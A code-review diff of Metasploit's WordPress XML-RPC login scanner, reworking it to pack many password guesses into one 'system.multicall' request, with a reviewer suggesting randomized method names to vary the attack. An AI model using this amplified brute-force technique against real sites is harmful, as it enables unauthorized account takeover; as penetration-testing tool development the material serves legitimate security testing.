lib/metasploit/framework/login_scanner/wordpress_rpc.rb

```diff
@@ -7,70 +8,116 @@ module LoginScanner
       # Wordpress XML RPC login scanner
       class WordpressRPC < HTTP
 
-        # (see Base#attempt_login)
-        def attempt_login(credential)
-          http_client = Rex::Proto::Http::Client.new(
-              host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies
-          )
-          configure_http_client(http_client)
+        attr_accessor :passwords
 
-          result_opts = {
-              credential: credential,
-              host: host,
-              port: port,
-              protocol: 'tcp'
-          }
-          if ssl
-            result_opts[:service_name] = 'https'
-          else
-            result_opts[:service_name] = 'http'
-          end
+        attr_accessor :chunk_size
+
+        attr_accessor :block_wait
+
+        attr_accessor :base_uri
 
-          begin
-            http_client.connect
-
-            request = http_client.request_cgi(
-                'uri' => uri,
-                'method' => method,
-                'data' => generate_xml_request(credential.public,credential.private),
-            )
-            response = http_client.send_recv(request)
-
-            if response && response.code == 200 && response.body =~ /<value><int>401<\/int><\/value>/ || response.body =~ /<name>user_id<\/name>/
-              result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: response)
-            elsif response.body =~ /<value><int>-32601<\/int><\/value>/
-              result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
-            else
-              result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: response)
+        attr_reader :wordpress_url_xmlrpc
+
+        def set_default
+          self.wordpress_url_xmlrpc = 'xmlrpc.php'
+        end
+
+        def generate_xml(user)
+          xml_payloads = []
+
+          # Evil XML | Limit number of log-ins to CHUNKSIZE/request due Wordpress limitation which is 1700 maximum.
+          passwords.each_slice(chunk_size) do |pass_group|
+            document = Nokogiri::XML::Builder.new do |xml|
+              xml.methodCall {
+                xml.methodName("system.multicall")
+                xml.params {
+                xml.param {
+                xml.value {
+                xml.array {
+                xml.data {
+                pass_group.each  do |pass|
+                  #$stderr.puts "Trying: #{user}:#{pass}"
+                  xml.value  {
+                  xml.struct {
+                  xml.member {
+                  xml.name("methodName")
+                  xml.value  { xml.string("wp.getUsersBlogs") }}
```

Comment:
maybe we can randomize wp.getUsersBlogs with the values from here? https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html ("This is a list of methods that require authentication")